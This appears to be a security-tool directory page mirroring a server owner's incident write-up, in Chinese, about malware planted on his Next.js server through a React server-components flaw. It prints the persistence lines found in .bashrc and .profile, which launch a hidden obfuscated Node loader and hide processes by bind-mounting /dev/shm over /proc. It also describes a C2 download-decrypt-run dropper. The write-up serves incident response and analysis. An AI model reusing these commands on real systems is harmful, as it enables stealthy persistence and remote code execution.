Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
react-cve-2025-55182 — malware I found on my server | Kitploit
工具/GitHubGitHub/stonelinks/react-cve-2025-55182
Persistence MechanismsReverse EngineeringData ExfiltrationForensicsMalware AnalysisCommand and ControlThreat IntelligenceIncident ResponsePayload Development
GitHubstonelinks/react-cve-2025-55182

react-cve-2025-55182

malware I found on my server

8个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

react-cve-2025-55182

这是在发现 React 服务器端渲染代码执行漏洞之后,我从我的婚礼网站服务器上发现的恶意软件和其他可疑垃圾的转储。那是一个运行着相当普通的 Next.js 应用的简陋 Digital Ocean Droplet。

CVE: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

一张显示各种峰值等活动的服务器日志截图: image

主要的恶意程序似乎安装在 /.local/share/.r0qsv8h1 中。

我发现的东西

在我的 bashrc 中:

root@kitploit:~
# System
(nohup /.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null

注意,那里的 pgreps 是为了阻止另一个名为 "meshagent" 的虚假恶意软件运行。你可以在 MESHAGENT.md 文档中了解相关信息。

在我的 profile 文件中也有相同的:

root@kitploit:~
# App
(/.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null

你可以在 SUSPICIOUS_SERVICES.md 中看到其他可疑服务。

以下是这个主要恶意软件的分析:

/.local/ 目录内容概述

目录 bad 包含一个自包含的 Node.js 运行时,附带一组高度混淆的 JavaScript 文件。
所有证据表明,这是一个恶意投递器,它静默地联系远程服务器,下载加密的有效载荷,解密后写入磁盘,并作为分离的后台进程执行。该代码还会定期检查服务器的更新。

文件及其用途

清单解码

.5f8562 中的 Base64 有效载荷解码为:

root@kitploit:~
{
  "0": "c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c",
  "1": ".fvq2lzj6te.js",
  "3": 1765307786421,
  "4": "desktop"
}
  • 键 "1" 引用主要的混淆加载脚本。
  • 键 "0" 是一个 UUID,可能用于远程服务器的追踪。
  • 键 "3" 是一个时间戳(Unix 纪元毫秒),指示清单生成的时间。
  • 键 "4" 指示目标位置(desktop),暗示有效载荷可能试图隐藏在那里。

执行流程

  1. 引导 – 当启动捆绑的 Node 二进制文件(例如 node .5f8562)时,清单指向 .fvq2lzj6te.js。
  2. 下载器 – 加载器向远程命令与控制服务器发起 JSON‑RPC 请求,接收 base64 编码的数据块,并使用类似 RC4 的自定义算法进行解密。
  3. 有效载荷部署 – 解密后的数据写入用户环境中的随机命名文件,并作为分离的子进程执行。
  4. 持久化/更新循环 – 一个 setInterval 定时器定期重复下载-解密-运行序列,允许攻击者在无需用户进一步交互的情况下推送新的或更新后的有效载荷。
  5. 后台执行 – 生成的进程使用自己的环境(PATH、cwd 等)运行,并可能执行典型的恶意行为,如挖矿、窃取凭证或远程命令执行。

潜在影响

  • 系统失陷 – 以启动 Node 运行时的用户权限执行任意代码。
  • 持久化 – 定期轮询确保恶意软件可以随时更新或替换。
  • 资源滥用 – 可能运行 CPU 密集型任务(例如加密货币挖矿)或窃取数据。
  • 隐蔽性 – 文件高度混淆,并且存在看似合法的 Node README 有助于隐藏恶意性质。

建议

  1. 立即删除 – 删除整个 .r0qsv8h1 目录及其可能创建的任何文件(检查用户的 Desktop 和临时目录中是否有新创建的可执行文件)。
  2. 系统扫描 – 在主机上运行信誉良好的反恶意软件扫描器,检测任何残留组件。
  3. 验证执行路径 – 确保没有启动脚本或计划任务引用此目录中的文件。
  4. 网络监控 – 阻止受影响机器到未知 IP/主机的出站连接,并审查最近的网络流量中是否有可疑的出站请求。
  5. 更新安全策略 – 限制未知二进制文件和脚本的执行,尤其是那些下载到用户可写位置的。

此分析由 AI 助手基于对目录中存在的文件进行静态检查自动完成。未执行运行时执行。

你可以在 DEOBFUSCATE.md 中阅读更多内容。

下载工具
文件描述
.394ly8v9/README.md标准的 Node.js README – 与恶意功能无关;仅用于使捆绑包看起来合法。
.fvq2lzl64e.js约 5 KB 的混淆 JavaScript。它构建一个 JSON‑RPC HTTP 请求,接收 base64 编码的有效载荷,使用自定义密码进行解密,将有效载荷写入随机文件,并通过 child_process.spawn / execSync 执行。它还会生成一个分离的后台进程,持续轮询远程服务器。
.lauphhtqrg.js约 13 KB 的混淆 JavaScript。实现类似的下载-解密-运行循环,使用自己的 RC4 风格密码(dec)。将解密后的有效载荷写入生成的文件名并运行。设置定时器以便稍后获取新的有效载荷。
.5f8562明文 Base64 字符串。解码为一个小的 JSON 清单: json { "0":"c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c", "1":".fvq2lzj6te.js", "3":1765307786421, "4":"desktop" } 该清单告诉加载器要执行哪个脚本(.fvq2lzj6te.js),并提供一个标识符/时间戳。
.b0rtqscrkeov尚未检查,但命名模式表明它是同一恶意链的另一个组件。
bin/node 及附带的 lib/ 文件完整的 Node.js 运行时,允许脚本即使在未安装 Node.js 的系统上也能运行。